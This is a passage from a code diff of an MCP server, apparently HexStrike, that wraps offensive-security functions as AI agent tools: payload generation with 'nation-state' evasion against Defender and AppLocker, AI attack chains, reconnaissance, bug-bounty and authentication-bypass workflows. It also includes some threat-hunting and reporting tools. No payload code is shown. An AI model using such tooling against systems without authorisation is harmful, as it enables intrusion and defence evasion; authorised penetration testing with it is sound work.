Timeframe: {timeframe}") result = hexstrike_client.safe_post("api/vuln-intel/threat-feeds", data) - + if result.get("success"): threat_intel = result.get("threat_intelligence", {}) correlations = len(threat_intel.get("correlations", [])) threat_score = threat_intel.get("threat_score", 0) - + logger.info(f"๐Ÿ“Š Found {correlations} threat correlations") logger.info(f"๐ŸŽฏ Overall Threat Score: {threat_score:.1f}/100") - + return result @mcp.tool() def advanced_payload_generation(attack_type: str, target_context: str = "", evasion_level: str = "standard", custom_constraints: str = "") -> Dict[str, Any]: """ Generate advanced payloads with AI-powered evasion techniques and contextual adaptation. 
- + Args: attack_type: Type of attack (rce, privilege_escalation, persistence, exfiltration, xss, sqli) target_context: Target environment details (OS, software versions, security controls) evasion_level: Evasion sophistication (basic, standard, advanced, nation-state) custom_constraints: Custom payload constraints (size limits, character restrictions, etc.) - + Returns: Advanced payloads with multiple evasion techniques and deployment instructions - + Example: advanced_payload_generation("rce", "Windows 11 + Defender + AppLocker", "nation-state", "max_size:256,no_quotes") """ valid_attack_types = ["rce", "privilege_escalation", "persistence", "exfiltration", "xss", "sqli", "lfi", "ssrf"] valid_evasion_levels = ["basic", "standard", "advanced", "nation-state"] - + if attack_type not in valid_attack_types: attack_type = "rce" - + if evasion_level not in valid_evasion_levels: evasion_level = "standard" - + data = { "attack_type": attack_type, "target_context": target_context, @@ -4224,45 +4231,45 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f"๐ŸŽฏ Generating advanced {attack_type} payload | Evasion: {evasion_level}") if target_context: logger.info(f"๐ŸŽฏ Target Context: {target_context}") - + result = hexstrike_client.safe_post("api/ai/advanced-payload-generation", data) - + if result.get("success"): payload_gen = result.get("advanced_payload_generation", {}) payload_count = payload_gen.get("payload_count", 0) evasion_applied = payload_gen.get("evasion_level", "none") - + logger.info(f"๐Ÿ“Š Generated {payload_count} advanced payloads") logger.info(f"๐Ÿ›ก๏ธ Evasion Level Applied: {evasion_applied}") - + return result @mcp.tool() def vulnerability_intelligence_dashboard() -> Dict[str, Any]: """ Get a comprehensive vulnerability intelligence dashboard with latest threats and trends. - + Returns: Dashboard with latest CVEs, trending vulnerabilities, exploit availability, and threat landscape - + Example: vulnerability_intelligence_dashboard() """ logger.info("๐Ÿ“Š Generating vulnerability intelligence dashboard") - + # Get latest critical CVEs latest_cves = hexstrike_client.safe_post("api/vuln-intel/cve-monitor", { "hours": 24, "severity_filter": "CRITICAL", "keywords": "" }) - + # Get trending attack types trending_research = hexstrike_client.safe_post("api/vuln-intel/zero-day-research", { "target_software": "web applications", "analysis_depth": "quick" }) - + # Compile dashboard dashboard = { "timestamp": time.time(), @@ -4284,7 +4291,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Review security controls against nation-state level attacks" ] } - + logger.info("โœ… Vulnerability intelligence dashboard generated") return { "success": True, @@ -4295,27 +4302,27 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def threat_hunting_assistant(target_environment: str, threat_indicators: str = "", hunt_focus: str = "general") -> Dict[str, Any]: """ AI-powered threat hunting assistant with vulnerability correlation and attack simulation. 
- + Args: target_environment: Environment to hunt in (e.g., "Windows Domain", "Cloud Infrastructure") threat_indicators: Known IOCs or suspicious indicators to investigate hunt_focus: Focus area (general, apt, ransomware, insider_threat, supply_chain) - + Returns: Threat hunting playbook with detection queries, IOCs, and investigation steps - + Example: threat_hunting_assistant("Windows Domain", "suspicious_process.exe,192.168.1.100", "apt") """ valid_hunt_focus = ["general", "apt", "ransomware", "insider_threat", "supply_chain"] if hunt_focus not in valid_hunt_focus: hunt_focus = "general" - + logger.info(f"๐Ÿ” Generating threat hunting playbook for {target_environment} | Focus: {hunt_focus}") - + # Parse indicators if provided indicators = [i.strip() for i in threat_indicators.split(",") if i.strip()] if threat_indicators else [] - + # Generate hunting playbook hunting_playbook = { "target_environment": target_environment, @@ -4326,7 +4333,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "threat_scenarios": [], "mitigation_strategies": [] } - + # Environment-specific detection queries if "windows" in target_environment.lower(): hunting_playbook["detection_queries"] = [ @@ -4342,7 +4349,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Privilege escalation events", "Data exfiltration indicators" ] - + # Focus-specific threat scenarios focus_scenarios = { "apt": [ @@ -4364,14 +4371,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Access to sensitive systems" ] } - + hunting_playbook["threat_scenarios"] = focus_scenarios.get(hunt_focus, [ "Unauthorized access attempts", "Suspicious process execution", "Network anomalies", "Data access violations" ]) - + # Investigation steps hunting_playbook["investigation_steps"] = [ "1. Validate initial indicators and expand IOC list", @@ -4382,15 +4389,15 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "6. Implement containment measures if threat confirmed", "7. Document findings and update detection rules" ] - + # Correlate with vulnerability intelligence if indicators provided if indicators: logger.info(f"๐Ÿง  Correlating {len(indicators)} indicators with threat intelligence") correlation_result = correlate_threat_intelligence(",".join(indicators), "30d", "all") - + if correlation_result.get("success"): hunting_playbook["threat_correlation"] = correlation_result.get("threat_intelligence", {}) - + logger.info("โœ… Threat hunting playbook generated") return { "success": True, @@ -4400,12 +4407,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # ENHANCED VISUAL OUTPUT TOOLS # ============================================================================ - + @mcp.tool() def get_live_dashboard() -> Dict[str, Any]: """ Get a beautiful live dashboard showing all active processes with enhanced visual formatting. - + Returns: Live dashboard with visual process monitoring and system metrics """ @@ -4421,33 +4428,33 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def create_vulnerability_report(vulnerabilities: str, target: str = "", scan_type: str = "comprehensive") -> Dict[str, Any]: """ Create a beautiful vulnerability report with severity-based styling and visual indicators. 
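        Example (a sketch only; the JSON fields shown are illustrative, not a fixed schema):
            create_vulnerability_report('[{"severity": "high", "title": "SQL injection"}]', target="example.com")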
- + Args: vulnerabilities: JSON string containing vulnerability data target: Target that was scanned scan_type: Type of scan performed - + Returns: Formatted vulnerability report with visual enhancements """ import json - + try: # Parse vulnerabilities if provided as JSON string if isinstance(vulnerabilities, str): vuln_data = json.loads(vulnerabilities) else: vuln_data = vulnerabilities - + logger.info(f"๐Ÿ“‹ Creating vulnerability report for {len(vuln_data)} findings") - + # Create individual vulnerability cards vulnerability_cards = [] for vuln in vuln_data: card_result = hexstrike_client.safe_post("api/visual/vulnerability-card", vuln) if card_result.get("success"): vulnerability_cards.append(card_result.get("vulnerability_card", "")) - + # Create summary report summary_data = { "target": target, @@ -4455,9 +4462,9 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "tools_used": [scan_type], "execution_time": 0 } - + summary_result = hexstrike_client.safe_post("api/visual/summary-report", summary_data) - + logger.info("โœ… Vulnerability report created successfully") return { "success": True, @@ -4466,7 +4473,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "total_vulnerabilities": len(vuln_data), "timestamp": summary_result.get("timestamp", "") } - + except Exception as e: logger.error(f"โŒ Failed to create vulnerability report: {str(e)}") return {"success": False, "error": str(e)} @@ -4475,51 +4482,51 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def format_tool_output_visual(tool_name: str, output: str, success: bool = True) -> Dict[str, Any]: """ Format tool output with beautiful visual styling, syntax highlighting, and structure. - + Args: tool_name: Name of the security tool output: Raw output from the tool success: Whether the tool execution was successful - + Returns: Beautifully formatted tool output with visual enhancements """ logger.info(f"๐ŸŽจ Formatting output for {tool_name}") - + data = { "tool": tool_name, "output": output, "success": success } - + result = hexstrike_client.safe_post("api/visual/tool-output", data) if result.get("success"): logger.info(f"โœ… Tool output formatted successfully for {tool_name}") else: logger.error(f"โŒ Failed to format tool output for {tool_name}") - + return result @mcp.tool() - def create_scan_summary(target: str, tools_used: str, vulnerabilities_found: int = 0, + def create_scan_summary(target: str, tools_used: str, vulnerabilities_found: int = 0, execution_time: float = 0.0, findings: str = "") -> Dict[str, Any]: """ Create a comprehensive scan summary report with beautiful visual formatting. 
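        Example (all values are placeholders):
            create_scan_summary("example.com", "nmap,nuclei,ffuf", vulnerabilities_found=3, execution_time=42.5)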
- + Args: target: Target that was scanned tools_used: Comma-separated list of tools used vulnerabilities_found: Number of vulnerabilities discovered execution_time: Total execution time in seconds findings: Additional findings or notes - + Returns: Beautiful scan summary report with visual enhancements """ logger.info(f"๐Ÿ“Š Creating scan summary for {target}") - + tools_list = [tool.strip() for tool in tools_used.split(",")] - + summary_data = { "target": target, "tools_used": tools_list, @@ -4527,31 +4534,31 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "vulnerabilities": [{"severity": "info"}] * vulnerabilities_found, # Mock data for count "findings": findings } - + result = hexstrike_client.safe_post("api/visual/summary-report", summary_data) if result.get("success"): logger.info("โœ… Scan summary created successfully") else: logger.error("โŒ Failed to create scan summary") - + return result @mcp.tool() def display_system_metrics() -> Dict[str, Any]: """ Display current system metrics and performance indicators with visual formatting. - + Returns: System metrics with beautiful visual presentation """ logger.info("๐Ÿ“ˆ Fetching system metrics") - + # Get telemetry data telemetry_result = hexstrike_client.safe_get("api/telemetry") - + if telemetry_result.get("success", True): logger.info("โœ… System metrics retrieved successfully") - + # Format the metrics for better display metrics = telemetry_result.get("system_metrics", {}) stats = { @@ -4562,7 +4569,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "commands_executed": telemetry_result.get("commands_executed", 0), "success_rate": telemetry_result.get("success_rate", "0%") } - + return { "success": True, "metrics": stats, @@ -4584,155 +4591,155 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # INTELLIGENT DECISION ENGINE TOOLS # ============================================================================ - + @mcp.tool() def analyze_target_intelligence(target: str) -> Dict[str, Any]: """ Analyze target using AI-powered intelligence to create comprehensive profile. - + Args: target: Target URL, IP address, or domain to analyze - + Returns: Comprehensive target profile with technology detection, risk assessment, and recommendations """ logger.info(f"๐Ÿง  Analyzing target intelligence for: {target}") - + data = {"target": target} result = hexstrike_client.safe_post("api/intelligence/analyze-target", data) - + if result.get("success"): profile = result.get("target_profile", {}) logger.info(f"โœ… Target analysis completed - Type: {profile.get('target_type')}, Risk: {profile.get('risk_level')}") else: logger.error(f"โŒ Target analysis failed for {target}") - + return result @mcp.tool() def select_optimal_tools_ai(target: str, objective: str = "comprehensive") -> Dict[str, Any]: """ Use AI to select optimal security tools based on target analysis and testing objective. 
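        Example (placeholder target; "selected_tools" mirrors the key this function reads from the response):
            result = select_optimal_tools_ai("example.com", "quick")
            tools = result.get("selected_tools", [])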
- + Args: target: Target to analyze objective: Testing objective - "comprehensive", "quick", or "stealth" - + Returns: AI-selected optimal tools with effectiveness ratings and target profile """ logger.info(f"๐ŸŽฏ Selecting optimal tools for {target} with objective: {objective}") - + data = { "target": target, "objective": objective } result = hexstrike_client.safe_post("api/intelligence/select-tools", data) - + if result.get("success"): tools = result.get("selected_tools", []) logger.info(f"โœ… AI selected {len(tools)} optimal tools: {', '.join(tools[:3])}{'...' if len(tools) > 3 else ''}") else: logger.error(f"โŒ Tool selection failed for {target}") - + return result @mcp.tool() def optimize_tool_parameters_ai(target: str, tool: str, context: str = "{}") -> Dict[str, Any]: """ Use AI to optimize tool parameters based on target profile and context. - + Args: target: Target to test tool: Security tool to optimize context: JSON string with additional context (stealth, aggressive, etc.) - + Returns: AI-optimized parameters for maximum effectiveness """ import json - + logger.info(f"โš™๏ธ Optimizing parameters for {tool} against {target}") - + try: context_dict = json.loads(context) if context != "{}" else {} except: context_dict = {} - + data = { "target": target, "tool": tool, "context": context_dict } result = hexstrike_client.safe_post("api/intelligence/optimize-parameters", data) - + if result.get("success"): params = result.get("optimized_parameters", {}) logger.info(f"โœ… Parameters optimized for {tool} - {len(params)} parameters configured") else: logger.error(f"โŒ Parameter optimization failed for {tool}") - + return result @mcp.tool() def create_attack_chain_ai(target: str, objective: str = "comprehensive") -> Dict[str, Any]: """ Create an intelligent attack chain using AI-driven tool sequencing and optimization. - + Args: target: Target for the attack chain objective: Attack objective - "comprehensive", "quick", or "stealth" - + Returns: AI-generated attack chain with success probability and time estimates """ logger.info(f"โš”๏ธ Creating AI-driven attack chain for {target}") - + data = { "target": target, "objective": objective } result = hexstrike_client.safe_post("api/intelligence/create-attack-chain", data) - + if result.get("success"): chain = result.get("attack_chain", {}) steps = len(chain.get("steps", [])) success_prob = chain.get("success_probability", 0) estimated_time = chain.get("estimated_time", 0) - + logger.info(f"โœ… Attack chain created - {steps} steps, {success_prob:.2f} success probability, ~{estimated_time}s") else: logger.error(f"โŒ Attack chain creation failed for {target}") - + return result @mcp.tool() def intelligent_smart_scan(target: str, objective: str = "comprehensive", max_tools: int = 5) -> Dict[str, Any]: """ Execute an intelligent scan using AI-driven tool selection and parameter optimization. 
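        Example (placeholder target; a low max_tools keeps a stealth run short):
            intelligent_smart_scan("example.com", "stealth", max_tools=3)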
- + Args: target: Target to scan objective: Scanning objective - "comprehensive", "quick", or "stealth" max_tools: Maximum number of tools to use - + Returns: Results from AI-optimized scanning with tool execution summary """ logger.info(f"{HexStrikeColors.FIRE_RED}๐Ÿš€ Starting intelligent smart scan for {target}{HexStrikeColors.RESET}") - + data = { "target": target, "objective": objective, "max_tools": max_tools } result = hexstrike_client.safe_post("api/intelligence/smart-scan", data) - + if result.get("success"): scan_results = result.get("scan_results", {}) tools_executed = scan_results.get("tools_executed", []) execution_summary = scan_results.get("execution_summary", {}) - + # Enhanced logging with detailed results logger.info(f"{HexStrikeColors.SUCCESS}โœ… Intelligent scan completed for {target}{HexStrikeColors.RESET}") logger.info(f"{HexStrikeColors.CYBER_ORANGE}๐Ÿ“Š Execution Summary:{HexStrikeColors.RESET}") @@ -4740,96 +4747,96 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" โ€ข Success rate: {execution_summary.get('success_rate', 0):.1f}%") logger.info(f" โ€ข Total vulnerabilities: {scan_results.get('total_vulnerabilities', 0)}") logger.info(f" โ€ข Execution time: {execution_summary.get('total_execution_time', 0):.2f}s") - + # Log successful tools successful_tools = [t['tool'] for t in tools_executed if t.get('success')] if successful_tools: logger.info(f"{HexStrikeColors.HIGHLIGHT_GREEN} Successful tools: {', '.join(successful_tools)} {HexStrikeColors.RESET}") - + # Log failed tools failed_tools = [t['tool'] for t in tools_executed if not t.get('success')] if failed_tools: logger.warning(f"{HexStrikeColors.HIGHLIGHT_RED} Failed tools: {', '.join(failed_tools)} {HexStrikeColors.RESET}") - + # Log vulnerabilities found if scan_results.get('total_vulnerabilities', 0) > 0: logger.warning(f"{HexStrikeColors.VULN_HIGH}๐Ÿšจ {scan_results['total_vulnerabilities']} vulnerabilities detected!{HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Intelligent scan failed for {target}: {result.get('error', 'Unknown error')}{HexStrikeColors.RESET}") - + return result @mcp.tool() def detect_technologies_ai(target: str) -> Dict[str, Any]: """ Use AI to detect technologies and provide technology-specific testing recommendations. - + Args: target: Target to analyze for technology detection - + Returns: Detected technologies with AI-generated testing recommendations """ logger.info(f"๐Ÿ” Detecting technologies for {target}") - + data = {"target": target} result = hexstrike_client.safe_post("api/intelligence/technology-detection", data) - + if result.get("success"): technologies = result.get("detected_technologies", []) cms = result.get("cms_type") recommendations = result.get("technology_recommendations", {}) - + tech_info = f"Technologies: {', '.join(technologies)}" if cms: tech_info += f", CMS: {cms}" - + logger.info(f"โœ… Technology detection completed - {tech_info}") logger.info(f"๐Ÿ“‹ Generated {len(recommendations)} technology-specific recommendations") else: logger.error(f"โŒ Technology detection failed for {target}") - + return result @mcp.tool() def ai_reconnaissance_workflow(target: str, depth: str = "standard") -> Dict[str, Any]: """ Execute AI-driven reconnaissance workflow with intelligent tool chaining. 
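        Example (placeholder target):
            ai_reconnaissance_workflow("example.com", depth="deep")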
- + Args: target: Target for reconnaissance depth: Reconnaissance depth - "surface", "standard", or "deep" - + Returns: Comprehensive reconnaissance results with AI-driven insights """ logger.info(f"๐Ÿ•ต๏ธ Starting AI reconnaissance workflow for {target} (depth: {depth})") - + # First analyze the target analysis_result = hexstrike_client.safe_post("api/intelligence/analyze-target", {"target": target}) - + if not analysis_result.get("success"): return analysis_result - + # Create attack chain for reconnaissance objective = "comprehensive" if depth == "deep" else "quick" if depth == "surface" else "comprehensive" chain_result = hexstrike_client.safe_post("api/intelligence/create-attack-chain", { "target": target, "objective": objective }) - + if not chain_result.get("success"): return chain_result - + # Execute the reconnaissance scan_result = hexstrike_client.safe_post("api/intelligence/smart-scan", { "target": target, "objective": objective, "max_tools": 8 if depth == "deep" else 3 if depth == "surface" else 5 }) - + logger.info(f"โœ… AI reconnaissance workflow completed for {target}") - + return { "success": True, "target": target, @@ -4844,25 +4851,25 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def ai_vulnerability_assessment(target: str, focus_areas: str = "all") -> Dict[str, Any]: """ Perform AI-driven vulnerability assessment with intelligent prioritization. - + Args: target: Target for vulnerability assessment focus_areas: Comma-separated focus areas - "web", "network", "api", "all" - + Returns: Prioritized vulnerability assessment results with AI insights """ logger.info(f"๐Ÿ”ฌ Starting AI vulnerability assessment for {target}") - + # Analyze target first analysis_result = hexstrike_client.safe_post("api/intelligence/analyze-target", {"target": target}) - + if not analysis_result.get("success"): return analysis_result - + profile = analysis_result.get("target_profile", {}) target_type = profile.get("target_type", "unknown") - + # Select tools based on focus areas and target type if focus_areas == "all": objective = "comprehensive" @@ -4872,16 +4879,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: objective = "comprehensive" else: objective = "quick" - + # Execute vulnerability assessment scan_result = hexstrike_client.safe_post("api/intelligence/smart-scan", { "target": target, "objective": objective, "max_tools": 6 }) - + logger.info(f"โœ… AI vulnerability assessment completed for {target}") - + return { "success": True, "target": target, @@ -4901,17 +4908,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ @mcp.tool() - def bugbounty_reconnaissance_workflow(domain: str, scope: str = "", out_of_scope: str = "", + def bugbounty_reconnaissance_workflow(domain: str, scope: str = "", out_of_scope: str = "", program_type: str = "web") -> Dict[str, Any]: """ Create comprehensive reconnaissance workflow for bug bounty hunting. 
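        Example (placeholder domains standing in for a program's scope):
            bugbounty_reconnaissance_workflow("example.com", scope="example.com,api.example.com", program_type="web")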
- + Args: domain: Target domain for bug bounty scope: Comma-separated list of in-scope domains/IPs out_of_scope: Comma-separated list of out-of-scope domains/IPs program_type: Type of program (web, api, mobile, iot) - + Returns: Comprehensive reconnaissance workflow with phases and tools """ @@ -4921,29 +4928,29 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "out_of_scope": out_of_scope.split(",") if out_of_scope else [], "program_type": program_type } - + logger.info(f"๐ŸŽฏ Creating reconnaissance workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/reconnaissance-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) logger.info(f"โœ… Reconnaissance workflow created - {workflow.get('tools_count', 0)} tools, ~{workflow.get('estimated_time', 0)}s") else: logger.error(f"โŒ Failed to create reconnaissance workflow for {domain}") - + return result @mcp.tool() - def bugbounty_vulnerability_hunting(domain: str, priority_vulns: str = "rce,sqli,xss,idor,ssrf", + def bugbounty_vulnerability_hunting(domain: str, priority_vulns: str = "rce,sqli,xss,idor,ssrf", bounty_range: str = "unknown") -> Dict[str, Any]: """ Create vulnerability hunting workflow prioritized by impact and bounty potential. - + Args: domain: Target domain for bug bounty priority_vulns: Comma-separated list of priority vulnerability types bounty_range: Expected bounty range (low, medium, high, critical) - + Returns: Vulnerability hunting workflow prioritized by impact """ @@ -4952,27 +4959,27 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "priority_vulns": priority_vulns.split(",") if priority_vulns else [], "bounty_range": bounty_range } - + logger.info(f"๐ŸŽฏ Creating vulnerability hunting workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/vulnerability-hunting-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) logger.info(f"โœ… Vulnerability hunting workflow created - Priority score: {workflow.get('priority_score', 0)}") else: logger.error(f"โŒ Failed to create vulnerability hunting workflow for {domain}") - + return result @mcp.tool() def bugbounty_business_logic_testing(domain: str, program_type: str = "web") -> Dict[str, Any]: """ Create business logic testing workflow for advanced bug bounty hunting. - + Args: domain: Target domain for bug bounty program_type: Type of program (web, api, mobile) - + Returns: Business logic testing workflow with manual and automated tests """ @@ -4980,84 +4987,84 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "domain": domain, "program_type": program_type } - + logger.info(f"๐ŸŽฏ Creating business logic testing workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/business-logic-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) test_count = sum(len(category["tests"]) for category in workflow.get("business_logic_tests", [])) logger.info(f"โœ… Business logic testing workflow created - {test_count} tests") else: logger.error(f"โŒ Failed to create business logic testing workflow for {domain}") - + return result @mcp.tool() def bugbounty_osint_gathering(domain: str) -> Dict[str, Any]: """ Create OSINT (Open Source Intelligence) gathering workflow for bug bounty reconnaissance. 
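The bug-bounty tools above pass comma-separated scope strings straight through `str.split(",")`, which keeps empty entries and surrounding whitespace. A slightly more defensive normalizer, sketched here for reference (not part of the patch):

```python
def split_scope(value: str) -> list[str]:
    """Split a comma-separated scope string, dropping blanks and stray whitespace."""
    return [item.strip() for item in value.split(",") if item.strip()]

assert split_scope("a.example.com, b.example.com, ") == ["a.example.com", "b.example.com"]
```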
- + Args: domain: Target domain for OSINT gathering - + Returns: OSINT gathering workflow with multiple intelligence phases """ data = {"domain": domain} - + logger.info(f"๐ŸŽฏ Creating OSINT gathering workflow for {domain}") result = hexstrike_client.safe_post("api/bugbounty/osint-workflow", data) - + if result.get("success"): workflow = result.get("workflow", {}) phases = len(workflow.get("osint_phases", [])) logger.info(f"โœ… OSINT workflow created - {phases} intelligence phases") else: logger.error(f"โŒ Failed to create OSINT workflow for {domain}") - + return result @mcp.tool() def bugbounty_file_upload_testing(target_url: str) -> Dict[str, Any]: """ Create file upload vulnerability testing workflow with bypass techniques. - + Args: target_url: Target URL with file upload functionality - + Returns: File upload testing workflow with malicious files and bypass techniques """ data = {"target_url": target_url} - + logger.info(f"๐ŸŽฏ Creating file upload testing workflow for {target_url}") result = hexstrike_client.safe_post("api/bugbounty/file-upload-testing", data) - + if result.get("success"): workflow = result.get("workflow", {}) phases = len(workflow.get("test_phases", [])) logger.info(f"โœ… File upload testing workflow created - {phases} test phases") else: logger.error(f"โŒ Failed to create file upload testing workflow for {target_url}") - + return result @mcp.tool() - def bugbounty_comprehensive_assessment(domain: str, scope: str = "", + def bugbounty_comprehensive_assessment(domain: str, scope: str = "", priority_vulns: str = "rce,sqli,xss,idor,ssrf", - include_osint: bool = True, + include_osint: bool = True, include_business_logic: bool = True) -> Dict[str, Any]: """ Create comprehensive bug bounty assessment combining all specialized workflows. - + Args: domain: Target domain for bug bounty scope: Comma-separated list of in-scope domains/IPs priority_vulns: Comma-separated list of priority vulnerability types include_osint: Include OSINT gathering workflow include_business_logic: Include business logic testing workflow - + Returns: Comprehensive bug bounty assessment with all workflows and summary """ @@ -5068,28 +5075,28 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "include_osint": include_osint, "include_business_logic": include_business_logic } - + logger.info(f"๐ŸŽฏ Creating comprehensive bug bounty assessment for {domain}") result = hexstrike_client.safe_post("api/bugbounty/comprehensive-assessment", data) - + if result.get("success"): assessment = result.get("assessment", {}) summary = assessment.get("summary", {}) logger.info(f"โœ… Comprehensive assessment created - {summary.get('workflow_count', 0)} workflows, ~{summary.get('total_estimated_time', 0)}s") else: logger.error(f"โŒ Failed to create comprehensive assessment for {domain}") - + return result @mcp.tool() def bugbounty_authentication_bypass_testing(target_url: str, auth_type: str = "form") -> Dict[str, Any]: """ Create authentication bypass testing workflow for bug bounty hunting. 
- + Args: target_url: Target URL with authentication auth_type: Type of authentication (form, jwt, oauth, saml) - + Returns: Authentication bypass testing strategies and techniques """ @@ -5119,7 +5126,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: {"technique": "Signature Bypass", "description": "Test signature validation bypass"} ] } - + workflow = { "target": target_url, "auth_type": auth_type, @@ -5133,9 +5140,9 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "estimated_time": 240, "manual_testing_required": True } - + logger.info(f"๐ŸŽฏ Created authentication bypass testing workflow for {target_url}") - + return { "success": True, "workflow": workflow, @@ -5145,13 +5152,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # ENHANCED HTTP TESTING FRAMEWORK & BROWSER AGENT (BURP SUITE ALTERNATIVE) # ============================================================================ - + @mcp.tool() - def http_framework_test(url: str, method: str = "GET", data: dict = {}, + def http_framework_test(url: str, method: str = "GET", data: dict = {}, headers: dict = {}, cookies: dict = {}, action: str = "request") -> Dict[str, Any]: """ Enhanced HTTP testing framework (Burp Suite alternative) for comprehensive web security testing. - + Args: url: Target URL to test method: HTTP method (GET, POST, PUT, DELETE, etc.) @@ -5159,7 +5166,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: headers: Custom headers cookies: Custom cookies action: Action to perform (request, spider, proxy_history, set_rules, set_scope, repeater, intruder) - + Returns: HTTP testing results with vulnerability analysis """ @@ -5171,28 +5178,28 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "cookies": cookies, "action": action } - + logger.info(f"{HexStrikeColors.FIRE_RED}๐Ÿ”ฅ Starting HTTP Framework {action}: {url}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/tools/http-framework", data_payload) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… HTTP Framework {action} completed for {url}{HexStrikeColors.RESET}") - + # Enhanced logging for vulnerabilities found if result.get("result", {}).get("vulnerabilities"): vuln_count = len(result["result"]["vulnerabilities"]) logger.info(f"{HexStrikeColors.HIGHLIGHT_RED} Found {vuln_count} potential vulnerabilities {HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ HTTP Framework {action} failed for {url}{HexStrikeColors.RESET}") - + return result @mcp.tool() - def browser_agent_inspect(url: str, headless: bool = True, wait_time: int = 5, + def browser_agent_inspect(url: str, headless: bool = True, wait_time: int = 5, action: str = "navigate", proxy_port: int = None, active_tests: bool = False) -> Dict[str, Any]: """ AI-powered browser agent for comprehensive web application inspection and security analysis. 
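Two signature details in the tools above are worth flagging. `data: dict = {}` (and the other dict defaults in http_framework_test) bind one shared dict across all calls, the classic Python mutable-default pitfall; it is latent here because the dicts are only read and forwarded, but it bites as soon as anyone mutates them. Likewise `proxy_port: int = None` in browser_agent_inspect is more precisely typed as `Optional[int]`. A safer pattern, sketched with a hypothetical helper name:

```python
from typing import Any, Dict, Optional

def http_test(url: str, data: Optional[Dict[str, Any]] = None,
              proxy_port: Optional[int] = None) -> Dict[str, Any]:
    # Fresh dict per call; avoids the shared-mutable-default pitfall.
    data = {} if data is None else data
    return {"url": url, "data": data, "proxy_port": proxy_port}
```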
- + Args: url: Target URL to inspect headless: Run browser in headless mode @@ -5200,7 +5207,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: action: Action to perform (navigate, screenshot, close, status) proxy_port: Optional proxy port for request interception active_tests: Run lightweight active reflected XSS tests (safe GET-only) - + Returns: Browser inspection results with security analysis """ @@ -5212,26 +5219,26 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "proxy_port": proxy_port, "active_tests": active_tests } - + logger.info(f"{HexStrikeColors.CRIMSON}๐ŸŒ Starting Browser Agent {action}: {url}{HexStrikeColors.RESET}") result = hexstrike_client.safe_post("api/tools/browser-agent", data_payload) - + if result.get("success"): logger.info(f"{HexStrikeColors.SUCCESS}โœ… Browser Agent {action} completed for {url}{HexStrikeColors.RESET}") - + # Enhanced logging for security analysis if action == "navigate" and result.get("result", {}).get("security_analysis"): security_analysis = result["result"]["security_analysis"] issues_count = security_analysis.get("total_issues", 0) security_score = security_analysis.get("security_score", 0) - + if issues_count > 0: logger.warning(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Security Issues: {issues_count} | Score: {security_score}/100 {HexStrikeColors.RESET}") else: logger.info(f"{HexStrikeColors.HIGHLIGHT_GREEN} No security issues found | Score: {security_score}/100 {HexStrikeColors.RESET}") else: logger.error(f"{HexStrikeColors.ERROR}โŒ Browser Agent {action} failed for {url}{HexStrikeColors.RESET}") - + return result # ---------------- Additional HTTP Framework Tools (sync with server) ---------------- @@ -5272,19 +5279,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return hexstrike_client.safe_post("api/tools/http-framework", payload) @mcp.tool() - def burpsuite_alternative_scan(target: str, scan_type: str = "comprehensive", - headless: bool = True, max_depth: int = 3, + def burpsuite_alternative_scan(target: str, scan_type: str = "comprehensive", + headless: bool = True, max_depth: int = 3, max_pages: int = 50) -> Dict[str, Any]: """ Comprehensive Burp Suite alternative combining HTTP framework and browser agent for complete web security testing. 
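The result handling below reads a nested `result.summary` structure out of the burpsuite-alternative response. For reference, a minimal consumer of that assumed shape (field names taken from the logging code that follows):

```python
def print_scan_summary(result: dict) -> None:
    """Pretty-print the summary shape the burpsuite-alternative route is assumed to return."""
    summary = result.get("result", {}).get("summary", {})
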